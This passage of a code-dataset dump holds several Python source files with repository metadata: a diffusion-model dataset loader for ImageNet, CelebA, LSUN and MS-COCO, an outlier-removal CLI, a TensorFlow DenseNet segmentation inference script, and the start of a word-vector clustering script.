device):\n return torch.randint(0, 1000, (n_samples,), device=device)\n\n\nclass ImageNet512Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = FeatureDataset(path)\n print('Prepare dataset ok')\n self.K = 1000\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.K)\n\n @property\n def data_shape(self):\n return 4, 64, 64\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet512_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.randint(0, 1000, (n_samples,), device=device)\n\n\nclass ImageNet(DatasetFactory):\n def __init__(self, path, resolution, random_crop=False, random_flip=True, cluster_path=None, fnames_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n if fnames_path == '':\n fnames_path = None\n\n print(f'Counting ImageNet files from {path}')\n train_files = _list_image_files_recursively(os.path.join(path, 'train'))\n class_names = [os.path.basename(path).split(\"_\")[0] for path in train_files]\n sorted_classes = {x: i for i, x in enumerate(sorted(set(class_names)))}\n train_labels = [sorted_classes[x] for x in class_names]\n print('Finish counting ImageNet files')\n\n self.train = ImageDataset(resolution, train_files, labels=train_labels, random_crop=random_crop, random_flip=random_flip)\n self.resolution = resolution\n if len(self.train) != 1_281_167:\n print(f'Missing train samples: {len(self.train)} < 1281167')\n\n if cluster_path is not None:\n print(f'renew targets from {cluster_path}')\n _cluster_labels = np.load(cluster_path)\n _fnames = torch.load(fnames_path)\n fnames_cluster_labels = dict(zip(_fnames, _cluster_labels))\n self.train.labels = [fnames_cluster_labels[os.path.split(fname)[-1]] for fname in self.train.image_paths]\n\n self.K = max(self.train.labels) + 1\n cnt = dict(zip(*np.unique(self.train.labels, 
return_counts=True)))\n self.cnt = torch.tensor([cnt[k] for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / len(self.train.labels) for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt[:10]: {self.cnt[:10]}')\n print(f'frac[:10]: {self.frac[:10]}')\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_imagenet{self.resolution}_guided_diffusion.npz'\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\nclass ImageNet_semi(ImageNet):\n def __init__(self, path, resolution, random_crop=False, random_flip=True, cluster_path=None, fnames_path=None, is_true_labels_path=None):\n super().__init__(path, resolution, random_crop, random_flip, cluster_path, fnames_path)\n assert is_true_labels_path is not None\n print(f'concat label with is_true_label from {is_true_labels_path}')\n _fnames = torch.load(fnames_path)\n _is_true_labels = torch.load(is_true_labels_path)\n fnames_is_true_labels = dict(zip(_fnames, _is_true_labels))\n isTruelabels = [fnames_is_true_labels[os.path.split(fname)[-1]] for fname in self.train.image_paths]\n self.train.labels = [(label, isTruelabel) for label, isTruelabel in zip(self.train.labels, isTruelabels)]\n\n\ndef _list_image_files_recursively(data_dir):\n results = []\n for entry in sorted(os.listdir(data_dir)):\n full_path = os.path.join(data_dir, entry)\n ext = entry.split(\".\")[-1]\n if \".\" in entry and ext.lower() in [\"jpg\", \"jpeg\", \"png\", \"gif\"]:\n results.append(full_path)\n elif os.listdir(full_path):\n results.extend(_list_image_files_recursively(full_path))\n return results\n\n\nclass ImageDataset(Dataset):\n def __init__(\n self,\n resolution,\n image_paths,\n labels,\n random_crop=False,\n random_flip=True,\n ):\n super().__init__()\n self.resolution = resolution\n self.image_paths = image_paths\n self.labels = labels\n self.random_crop = random_crop\n self.random_flip = random_flip\n\n def __len__(self):\n return len(self.image_paths)\n\n def __getitem__(self, idx):\n path = self.image_paths[idx]\n pil_image = Image.open(path)\n pil_image.load()\n pil_image = pil_image.convert(\"RGB\")\n\n if self.random_crop:\n arr = random_crop_arr(pil_image, self.resolution)\n else:\n arr = center_crop_arr(pil_image, self.resolution)\n\n if self.random_flip and random.random() < 0.5:\n arr = arr[:, ::-1]\n\n arr = arr.astype(np.float32) / 127.5 - 1\n\n label = np.array(self.labels[idx], dtype=np.float64)\n return np.transpose(arr, [2, 0, 1]), label\n\n\ndef center_crop_arr(pil_image, image_size):\n # We are not on a new enough PIL to support the `reducing_gap`\n # argument, which uses BOX downsampling at powers of two first.\n # Thus, we do it by hand to improve downsample quality.\n while min(*pil_image.size) >= 2 * image_size:\n pil_image = pil_image.resize(\n tuple(x // 2 for x in pil_image.size), resample=Image.BOX\n )\n\n scale = image_size / min(*pil_image.size)\n pil_image = pil_image.resize(\n tuple(round(x * scale) for x in pil_image.size), resample=Image.BICUBIC\n )\n\n arr = np.array(pil_image)\n crop_y = (arr.shape[0] - image_size) // 2\n crop_x = (arr.shape[1] - image_size) // 2\n return arr[crop_y : crop_y + image_size, crop_x : crop_x + image_size]\n\n\ndef random_crop_arr(pil_image, image_size, min_crop_frac=0.8, max_crop_frac=1.0):\n min_smaller_dim_size = math.ceil(image_size / max_crop_frac)\n 
max_smaller_dim_size = math.ceil(image_size / min_crop_frac)\n smaller_dim_size = random.randrange(min_smaller_dim_size, max_smaller_dim_size + 1)\n\n # We are not on a new enough PIL to support the `reducing_gap`\n # argument, which uses BOX downsampling at powers of two first.\n # Thus, we do it by hand to improve downsample quality.\n while min(*pil_image.size) >= 2 * smaller_dim_size:\n pil_image = pil_image.resize(\n tuple(x // 2 for x in pil_image.size), resample=Image.BOX\n )\n\n scale = smaller_dim_size / min(*pil_image.size)\n pil_image = pil_image.resize(\n tuple(round(x * scale) for x in pil_image.size), resample=Image.BICUBIC\n )\n\n arr = np.array(pil_image)\n crop_y = random.randrange(arr.shape[0] - image_size + 1)\n crop_x = random.randrange(arr.shape[1] - image_size + 1)\n return arr[crop_y: crop_y + image_size, crop_x: crop_x + image_size]\n\n\n# CelebA\n\n\nclass Crop(object):\n def __init__(self, x1, x2, y1, y2):\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n\n def __call__(self, img):\n return F.crop(img, self.x1, self.y1, self.x2 - self.x1, self.y2 - self.y1)\n\n def __repr__(self):\n return self.__class__.__name__ + \"(x1={}, x2={}, y1={}, y2={})\".format(\n self.x1, self.x2, self.y1, self.y2\n )\n\n\nclass CelebA(DatasetFactory):\n r\"\"\" train: 162,770\n val: 19,867\n test: 19,962\n shape: 3 * width * width\n \"\"\"\n\n def __init__(self, path, resolution=64, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n self.resolution = resolution\n\n cx = 89\n cy = 121\n x1 = cy - 64\n x2 = cy + 64\n y1 = cx - 64\n y2 = cx + 64\n\n transform = transforms.Compose([Crop(x1, x2, y1, y2), transforms.Resize(self.resolution),\n transforms.RandomHorizontalFlip(), transforms.ToTensor(),\n transforms.Normalize(0.5, 0.5)])\n self.train = datasets.CelebA(root=path, split=\"train\", target_type=[], transform=transform, download=True)\n self.train = UnlabeledDataset(self.train)\n\n if cluster_path is not None:\n print(f'get targets from {cluster_path}')\n self.labels = np.load(cluster_path)\n self.train = LabeledDataset(self.train, self.labels)\n self.K = max(self.labels) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.labels) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n else:\n self.labels = None\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return 'assets/fid_stats/fid_stats_celeba64_train_50000_ddim.npz'\n\n @property\n def has_label(self):\n return self.labels is not None\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# LSUN Bedroom\n\n\nclass LSUNBedroom(DatasetFactory):\n def __init__(self, path, resolution=64):\n super().__init__()\n self.resolution = resolution\n transform = transforms.Compose([transforms.Resize(resolution), transforms.CenterCrop(resolution),\n transforms.ToTensor(), transforms.Normalize(0.5, 0.5)])\n self.train = UnlabeledDataset(datasets.LSUN(root=path, classes=[\"bedroom_train\"], transform=transform)) \\\n if os.path.exists(os.path.join(path, 'bedroom_train_lmdb')) else None\n\n @property\n def data_shape(self):\n return 3, self.resolution, self.resolution\n\n @property\n def fid_stat(self):\n return 
f'assets/fid_stats/fid_stats_lsun_bedroom{self.resolution}_train_50000.npz'\n\n @property\n def has_label(self):\n return False\n\n\nclass ImageDataset2(Dataset):\n def __init__(self, path, transform=None):\n super().__init__()\n names = sorted(os.listdir(path))\n self.local_images = [os.path.join(path, name) for name in names]\n self.transform = transform\n\n def __len__(self):\n return len(self.local_images)\n\n def __getitem__(self, idx):\n X = Image.open(self.local_images[idx])\n if self.transform is not None:\n X = self.transform(X)\n return X\n\n\nclass LSUNBedroom64(DatasetFactory):\n def __init__(self, path, cluster_path=None):\n super().__init__()\n if cluster_path == '':\n cluster_path = None\n\n train_path = os.path.join(path, 'lsun_bedroom64_train')\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(0.5, 0.5)])\n self.train = ImageDataset2(path=train_path, transform=transform) if os.path.exists(train_path) else None\n\n if cluster_path is not None:\n print(f'get targets from {cluster_path}')\n self.labels = np.load(cluster_path)\n self.train = LabeledDataset(self.train, self.labels)\n self.K = max(self.labels) + 1\n self.cnt = torch.tensor([len(np.where(np.array(self.labels) == k)[0]) for k in range(self.K)]).float()\n self.frac = [self.cnt[k] / 50000 for k in range(self.K)]\n print(f'{self.K} classes')\n print(f'cnt: {self.cnt}')\n print(f'frac: {self.frac}')\n else:\n self.labels = None\n\n @property\n def data_shape(self):\n return 3, 64, 64\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_lsun_bedroom64_train_50000.npz'\n\n @property\n def has_label(self):\n return self.labels is not None\n\n def sample_label(self, n_samples, device):\n return torch.multinomial(self.cnt, n_samples, replacement=True).to(device)\n\n def label_prob(self, k):\n return self.frac[k]\n\n\n# MS COCO\n\n\ndef center_crop(width, height, img):\n resample = {'box': Image.BOX, 'lanczos': Image.LANCZOS}['lanczos']\n crop = np.min(img.shape[:2])\n img = img[(img.shape[0] - crop) // 2: (img.shape[0] + crop) // 2,\n (img.shape[1] - crop) // 2: (img.shape[1] + crop) // 2]\n try:\n img = Image.fromarray(img, 'RGB')\n except:\n img = Image.fromarray(img)\n img = img.resize((width, height), resample)\n\n return np.array(img).astype(np.uint8)\n\n\nclass MSCOCODatabase(Dataset):\n def __init__(self, root, annFile, size=None):\n from pycocotools.coco import COCO\n self.root = root\n self.height = self.width = size\n\n self.coco = COCO(annFile)\n self.keys = list(sorted(self.coco.imgs.keys()))\n\n def _load_image(self, key: int):\n path = self.coco.loadImgs(key)[0][\"file_name\"]\n return Image.open(os.path.join(self.root, path)).convert(\"RGB\")\n\n def _load_target(self, key: int):\n return self.coco.loadAnns(self.coco.getAnnIds(key))\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, index):\n key = self.keys[index]\n image = self._load_image(key)\n image = np.array(image).astype(np.uint8)\n image = center_crop(self.width, self.height, image).astype(np.float32)\n image = (image / 127.5 - 1.0).astype(np.float32)\n image = einops.rearrange(image, 'h w c -> c h w')\n\n anns = self._load_target(key)\n target = []\n for ann in anns:\n target.append(ann['caption'])\n\n return image, target\n\n\ndef int2bit(x, n=8):\n x = einops.rearrange(x, '... -> ... 
()')\n x = np.right_shift(x, np.arange(n))\n x = x % 2\n return x\n\n\ndef bit2int(x):\n n = x.shape[-1]\n if isinstance(x, np.ndarray):\n return (x * (2 ** np.arange(n))).sum(axis=-1)\n elif isinstance(x, torch.Tensor):\n return (x * (2 ** torch.arange(n, device=x.device))).sum(dim=-1)\n else:\n raise NotImplementedError\n\n\nclass _BitMSCOCOText(Dataset):\n def __init__(self, annFile):\n from pycocotools.coco import COCO\n self.coco = COCO(annFile)\n self.keys = list(sorted(self.coco.imgs.keys()))\n\n from transformers import CLIPTokenizer\n self.tokenizer = CLIPTokenizer.from_pretrained(\"openai/clip-vit-large-patch14\")\n self.n_bits = self.tokenizer.vocab_size.bit_length()\n\n def _load_target(self, key: int):\n return self.coco.loadAnns(self.coco.getAnnIds(key))\n\n def __len__(self):\n return len(self.keys)\n\n def __getitem__(self, index):\n key = self.keys[index]\n anns = self._load_target(key)\n ann = random.choice(anns)['caption'] # string\n\n x = self.tokenizer(ann, truncation=True, max_length=77, return_length=True,\n return_overflowing_tokens=False, padding=\"max_length\", return_tensors=\"pt\")[\"input_ids\"]\n x = x.squeeze(dim=0) # tokens\n x = x.numpy()\n x = int2bit(x, self.n_bits) # {0, 1}\n x = 2 * torch.tensor(x, dtype=torch.float32) - 1 # {-1., 1.}\n return x\n\n\nclass BitMSCOCOText(DatasetFactory):\n def __init__(self, path):\n super().__init__()\n self.train = _BitMSCOCOText(os.path.join(path, 'annotations', 'captions_train2014.json'))\n\n def unpreprocess(self, v): # to str\n # v: {-1., 1.}\n v = v > 0 # B L N\n v = bit2int(v).cpu().detach() # B L\n ss = []\n for _v in v:\n _v = list(filter(lambda x: 0 <= x <= self.train.tokenizer.vocab_size - 1, _v))\n s = self.train.tokenizer.decode(_v, skip_special_tokens=True)\n ss.append(s)\n return ss\n\n @property\n def data_shape(self):\n return 77, 16\n\n @property\n def has_label(self):\n return False\n\n\ndef get_feature_dir_info(root):\n files = glob.glob(os.path.join(root, '*.npy'))\n files_caption = glob.glob(os.path.join(root, '*_*.npy'))\n num_data = len(files) - len(files_caption)\n n_captions = {k: 0 for k in range(num_data)}\n for f in files_caption:\n name = os.path.split(f)[-1]\n k1, k2 = os.path.splitext(name)[0].split('_')\n n_captions[int(k1)] += 1\n return num_data, n_captions\n\n\nclass MSCOCOFeatureDataset(Dataset):\n # the image features are got through sample\n def __init__(self, root):\n self.root = root\n self.num_data, self.n_captions = get_feature_dir_info(root)\n\n def __len__(self):\n return self.num_data\n\n def __getitem__(self, index):\n z = np.load(os.path.join(self.root, f'{index}.npy'))\n k = random.randint(0, self.n_captions[index] - 1)\n c = np.load(os.path.join(self.root, f'{index}_{k}.npy'))\n return z, c\n\n\ndef get_karpathy_val_split_gts(path): # the ground truth for calculating captioning metrics, e.g., BLEU\n split_file = os.path.join(path, f'val_ids.npy')\n split_info = np.load(split_file)\n from pycocotools.coco import COCO\n coco_train2014 = COCO(os.path.join(path, 'captions_train2014.json'))\n coco_val2014 = COCO(os.path.join(path, 'captions_val2014.json'))\n gts = {}\n for fname, key in split_info:\n key = int(key)\n if 'train' in fname:\n gts[key] = coco_train2014.loadAnns(coco_train2014.getAnnIds(key))\n else:\n gts[key] = coco_val2014.loadAnns(coco_val2014.getAnnIds(key))\n return gts\n\n\nclass MSCOCOFeatureDatasetKarpathySplit(Dataset):\n def __init__(self, path, split, ret_key=False):\n self.path = path\n self.ret_key =ret_key\n split_file = os.path.join(path, 
f'{split}_ids.npy')\n self.split_info = np.load(split_file)\n\n from pycocotools.coco import COCO\n self.coco_train2014 = COCO(os.path.join(path, 'captions_train2014.json'))\n self.coco_val2014 = COCO(os.path.join(path, 'captions_val2014.json'))\n self.coco_train2014_keys = list(sorted(self.coco_train2014.imgs.keys()))\n self.coco_val2014_keys = list(sorted(self.coco_val2014.imgs.keys()))\n self.coco_train2014_keys_indexes = {key: index for index, key in enumerate(self.coco_train2014_keys)}\n self.coco_val2014_keys_indexes = {key: index for index, key in enumerate(self.coco_val2014_keys)}\n\n self.coco_train2014_num_data, self.coco_train2014_n_captions = get_feature_dir_info(os.path.join(path, 'train'))\n self.coco_val2014_num_data, self.coco_val2014_n_captions = get_feature_dir_info(os.path.join(path, 'val'))\n\n\n def __len__(self):\n return len(self.split_info)\n\n def __getitem__(self, index):\n fname, key = self.split_info[index]\n key = int(key)\n if key in self.coco_train2014_keys_indexes:\n assert key not in self.coco_val2014_keys_indexes\n assert 'train' in fname\n index = self.coco_train2014_keys_indexes[key]\n z = np.load(os.path.join(self.path, 'train', f'{index}.npy'))\n k = random.randint(0, self.coco_train2014_n_captions[index] - 1)\n c = np.load(os.path.join(self.path, 'train', f'{index}_{k}.npy'))\n else:\n assert key not in self.coco_train2014_keys_indexes\n assert 'val' in fname\n index = self.coco_val2014_keys_indexes[key]\n z = np.load(os.path.join(self.path, 'val', f'{index}.npy'))\n k = random.randint(0, self.coco_val2014_n_captions[index] - 1)\n c = np.load(os.path.join(self.path, 'val', f'{index}_{k}.npy'))\n if self.ret_key:\n return z, c, key\n else:\n return z, c\n\n\nclass MSCOCO256Features(DatasetFactory): # the moments calculated by Stable Diffusion image encoder & the contexts calculated by clip\n def __init__(self, path, cfg=False, p_uncond=None):\n super().__init__()\n print('Prepare dataset...')\n self.train = MSCOCOFeatureDataset(os.path.join(path, 'train'))\n self.test = MSCOCOFeatureDataset(os.path.join(path, 'val'))\n assert len(self.train) == 82783\n assert len(self.test) == 40504\n print('Prepare dataset ok')\n\n self.empty_context = np.load(os.path.join(path, 'empty_context.npy'))\n\n if cfg: # classifier free guidance\n assert p_uncond is not None\n print(f'prepare the dataset for classifier free guidance with p_uncond={p_uncond}')\n self.train = CFGDataset(self.train, p_uncond, self.empty_context)\n\n # text embedding extracted by clip\n # for visulization in t2i\n self.prompts, self.contexts = [], []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis')), key=lambda x: int(x.split('.')[0])):\n prompt, context = np.load(os.path.join(path, 'run_vis', f), allow_pickle=True)\n self.prompts.append(prompt)\n self.contexts.append(context)\n self.contexts = np.array(self.contexts)\n\n # image embedding extracted by stable diffusion image encoder\n # for visulization in i2t\n self.img_contexts = []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis_i2t')), key=lambda x: int(x.split('.')[0])):\n if f.endswith('.npy'):\n img_context = np.load(os.path.join(path, 'run_vis_i2t', f))\n self.img_contexts.append(img_context)\n self.img_contexts = np.array(self.img_contexts)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n @property\n def fid_stat(self):\n return f'assets/fid_stats/fid_stats_mscoco256_val.npz'\n\n\nclass MSCOCO256FeaturesKarpathy(DatasetFactory): # only for i2t\n def __init__(self, path):\n super().__init__()\n 
print('Prepare dataset...')\n self.train = MSCOCOFeatureDatasetKarpathySplit(path, 'train')\n self.test = MSCOCOFeatureDatasetKarpathySplit(path, 'val', ret_key=True) # for validation\n assert len(self.train) == 113287\n print('Prepare dataset ok')\n\n self.val_gts = get_karpathy_val_split_gts(path)\n\n # image embedding extracted by stable diffusion image encoder\n # for visulization in i2t\n self.img_contexts = []\n for f in sorted(os.listdir(os.path.join(path, 'run_vis_i2t')), key=lambda x: int(x.split('.')[0])):\n if f.endswith('.npy'):\n img_context = np.load(os.path.join(path, 'run_vis_i2t', f))\n self.img_contexts.append(img_context)\n self.img_contexts = np.array(self.img_contexts)\n\n @property\n def data_shape(self):\n return 4, 32, 32\n\n\ndef get_dataset(name, **kwargs):\n if name == 'cifar10':\n return CIFAR10(**kwargs)\n elif name == 'imagenet':\n return ImageNet(**kwargs)\n elif name == 'imagenet256_features':\n return ImageNet256Features(**kwargs)\n elif name == 'imagenet512_features':\n return ImageNet512Features(**kwargs)\n elif name == 'celeba':\n return CelebA(**kwargs)\n elif name == 'lsun_bedroom':\n return LSUNBedroom(**kwargs)\n elif name == 'lsun_bedroom64':\n return LSUNBedroom64(**kwargs)\n elif name == 'mscoco256_features':\n return MSCOCO256Features(**kwargs)\n elif name == 'mscoco256_features_karpathy':\n return MSCOCO256FeaturesKarpathy(**kwargs)\n elif name == 'bit_mscoco_text':\n return BitMSCOCOText(**kwargs)\n else:\n raise NotImplementedError(name)\n","repo_name":"ML-GSAI/DPT","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":30295,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"16"} +{"seq_id":"11364338185","text":"import click\nfrom pathlib import Path\nfrom .algorithm import (\n OutlierDetectionModel,\n TrailingZScoreConfig,\n DEFAULT_LOOKBACK_WINDOW,\n)\nfrom .utils import (\n cli_error,\n cli_print_outlier_output,\n cli_read_csv,\n cli_saved_removed_outliers,\n)\n\n\n@click.command()\n@click.argument(\"src-path\", type=Path)\n@click.argument(\"field\", type=str)\n@click.option(\n \"--dest-path\",\n default=None,\n help=(\n \"Optionally add name of output file. \"\n \"Filename is suffixed with '-altered' if this is not provided\"\n ),\n)\n@click.option(\n \"--inc-current\",\n default=False,\n type=bool,\n help=(\n \"Include the current observation in the z-score calc. 
This determines \"\n \"the scoring strategy described in the readme\"\n ),\n)\n@click.option(\n \"--lookback\",\n default=DEFAULT_LOOKBACK_WINDOW,\n help=\"Look back window used to calculate z scores\",\n type=int,\n)\ndef main(src_path: Path, field: str, dest_path: Path, inc_current: bool, lookback: int):\n \"\"\"\n \\b\n\n Remove outliers from a CSV.\n\n Required Arguments:\n\n - SRC-PATH: Path: Path to the csv to remove outliers from\n\n - FIELD: str: Column name of discrete variable evaluate\n \"\"\"\n\n config = TrailingZScoreConfig(\n lookback_window=lookback, z_score_incl_current=inc_current\n )\n src_path = src_path.resolve()\n if not src_path.is_file():\n cli_error(f\"File '{str(src_path)}' does not exist\")\n\n data = cli_read_csv(src_path)\n model = OutlierDetectionModel(config)\n\n try:\n if field not in data.columns:\n raise KeyError(f\"KeyError: column '{field}' not a valid column name\")\n outliers = model.fit_predict(data[field])\n except Exception as e:\n cli_error(str(e))\n\n cli_print_outlier_output(data, outliers)\n\n cli_saved_removed_outliers(src_path, data, outliers, dest_path)\n\n\n@click.group()\ndef cli():\n pass\n\n\ncli.add_command(main)\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"nicelgueta/outlier-detection","sub_path":"outliers/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43825133185","text":"import tensorflow as tf\nimport cv2\nimport time\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom utils import *\n\ndense_block1_num = 2\ndense_block2_num = 2\ndense_block3_num = 3\ndense_block4_num = 3\ngrowth_rate = 16\ntest_number = 0\n\n\ndef dense_net(image, img_name_index, is_training=True):\n with tf.variable_scope('conv1') as scope:\n l = conv2d(image, 3, 24, 3, 1)\n\n with tf.variable_scope('conv2_3') as scope:\n l_big = bn_relu_conv(l, is_training, 24, 32, 3, 1, name='bn_relu_conv1')\n # l = bn_relu_conv(l, is_training, 32, 32, 3, 1, name='bn_relu_conv2')\n\n # 跳链接层数可以多,其他地方尽量少\n l_first_down = tf.nn.max_pool(l_big, [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n with tf.variable_scope('block1') as scope:\n # l = conv2d(l_first_down,32,growth_rate,3,1)#delete\n l = l_first_down\n for i in range(dense_block1_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n # l = bn_relu_conv(l, is_training, growth_rate*(dense_block1_num+1), 32, 3, 1)\n block1, l = add_transition_average('transition1', l, is_training,\n input_filters=growth_rate * dense_block1_num + 32, output_filters=32)\n\n with tf.variable_scope('block2') as scope:\n # l = conv2d(l,32,growth_rate,3,1)#delete\n for i in range(dense_block2_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n # l = bn_relu_conv(l,is_training,growth_rate*(1+dense_block2_num),32,3,1)\n block2, l = add_transition_average('transition2', l, is_training,\n input_filters=growth_rate * dense_block2_num + 32, output_filters=32)\n\n with tf.variable_scope('block3') as scope:\n # l = conv2d(l, 32, growth_rate, 3, 1)\n for i in range(dense_block3_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n block3, l = add_transition_average('transition3', l, is_training,\n input_filters=growth_rate * dense_block3_num + 32, output_filters=32)\n\n with tf.variable_scope('block4') as scope:\n # l = conv2d(l, 32, 
growth_rate, 3, 1)\n for i in range(dense_block4_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 32)\n\n with tf.variable_scope('block3_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block4_num + 32, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block3], 3)\n # l=bn_relu_conv(l,is_training,64,growth_rate,3,1,name='bn_relu_conv2')\n for i in range(dense_block3_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n with tf.variable_scope('block2_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block3_num + 64, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block2], 3)\n # l = bn_relu_conv(l, is_training, 64, growth_rate, 3, 1,name='bn_relu_conv2')\n for i in range(dense_block2_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n with tf.variable_scope('block1_up') as scope:\n l = bn_relu_conv(l, is_training, growth_rate * dense_block2_num + 64, 32, 3, 1, name='bn_relu_conv1')\n l = upsample(l, 32, 32, 3, 2)\n l = tf.concat([l, block1], 3)\n # l = bn_relu_conv(l, is_training, 64, growth_rate, 3, 1,name='bn_relu_conv2')\n for i in range(dense_block1_num):\n l = add_layer('dense_layer.{}'.format(i), l, is_training, input_filters1=growth_rate * i + 64)\n\n l = bn_relu_conv(l, is_training, growth_rate * dense_block1_num + 64, 32, 3, 1, name='bn_relu_conv1')\n with tf.variable_scope('upsample1') as scope:\n l = upsample(l, 32, 32, 3, 2)\n # concat\n l = tf.concat([l, l_big], 3)\n l = bn_relu_conv(l, is_training, 64, 64, 3, 1)\n l = tf.nn.dropout(l, 0.5)\n # spatial dropout,dropout rate 0.5\n l = bn_relu_conv(l, is_training, 64, 32, 1, 1, name='bn_relu_conv2')\n\n with tf.variable_scope('bn_sigmoid_conv') as scope:\n l = bn_relu_conv(l, is_training, 32, 1, 1, 1)\n\n image_conv = tf.nn.sigmoid(l)\n\n saver = tf.train.Saver()\n if ckpt and ckpt.model_checkpoint_path:\n if img_name_index == 0:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print('model restored')\n return image_conv\n\n\ndef inference(image, img_name_index, is_training=True, scope_name='inference_net', scope_reuse=True):\n with tf.variable_scope(scope_name, reuse=scope_reuse) as scope:\n if scope_reuse:\n scope.reuse_variables()\n annotation_pred = dense_net(image, img_name_index, is_training)\n return annotation_pred\n\n\nsess = tf.InteractiveSession()\n# height = 960#训练图片的高\n# width = 960#训练图片的宽\nbatch_size = 40\nwrite_number = 0\nis_training = True\nprevious_time = time.clock()\ntotal_loss_list = []\nckpt = tf.train.get_checkpoint_state('E:/Tianchi/Densenet/my_network/model/')\n\npath = 'E:/Tianchi/NEW_DATA2/224_rgb/2015_224_rgb/'\nwrite_path = 'E:/Tianchi/Densenet/my_network/result_newmodel45000_2015_224/'\nimage_number = len(os.listdir(path))\nwrite_number = write_number + 1\noutput_store = np.zeros([batch_size, 224, 224, 3])\nfor img_name_index in range(0, image_number, batch_size):\n if img_name_index + batch_size > image_number:\n batch_size = image_number - img_name_index\n img_batch_store = np.zeros([batch_size, 224, 224, 3])\n for i in range(batch_size):\n img_path_input = path + os.listdir(path)[img_name_index + i]\n img_test = cv2.imread(img_path_input)\n # height,width,channel = img_test.shape\n img_test = cv2.resize(img_test, (224, 224), interpolation=cv2.INTER_CUBIC)\n img_batch_store[i, :, :, :] = img_test\n\n img_test_tensor = 
tf.convert_to_tensor(img_batch_store, dtype=tf.uint8)\n img_input = tf.reshape(img_test_tensor, [batch_size, 224, 224, 3])\n img_input = tf.cast(img_input, tf.float32)\n img_input = img_input * (1. / 255)\n if img_name_index == 0:\n output = inference(img_input, img_name_index, is_training=False, scope_reuse=False)\n else:\n output = inference(img_input, img_name_index, is_training=False, scope_reuse=True)\n # output = inference(img_input, is_training=True,scope_reuse=True)\n # output =model_enhance_subpixel_BN.transform_net(img_input,size, upscale,scope_reuse=True,is_training=False)\n output = output * 255\n output = tf.reshape(output, [batch_size, 224, 224, 1])\n output = output.eval()\n output[output > 100] = 255\n output[output <= 100] = 0\n\n for j in range(batch_size):\n savepath = write_path + os.listdir(path)[img_name_index + j]\n # output1 = cv2.resize(output[j,:,:,:], (224,224), interpolation=cv2.INTER_CUBIC)\n cv2.imwrite(savepath, output[j, :, :, :])\n","repo_name":"qwerty200696/Tianchi_Competition_2017","sub_path":"code/20171105/Densenet/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"22803296874","text":"from sklearn.cluster import KMeans\nfrom numbers import Number\nfrom pandas import DataFrame\nimport sys, codecs, numpy\nimport pickle\nfrom tqdm import tqdm\nfrom gensim.models import FastText\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\n\nclass autovivify_list(dict):\n '''A pickleable version of collections.defaultdict'''\n def __missing__(self, key):\n '''Given a missing key, set initial value to an empty list'''\n value = self[key] = []\n return value\n\n def __add__(self, x):\n '''Override addition for numeric types when self is empty'''\n if not self and isinstance(x, Number):\n return x\n raise ValueError\n\n def __sub__(self, x):\n '''Also provide subtraction method'''\n if not self and isinstance(x, Number):\n return -1 * x\n raise ValueError\n\ndef build_word_vector_matrix(vector_file, n_words):\n '''Return the vectors and labels for the first n_words in vector 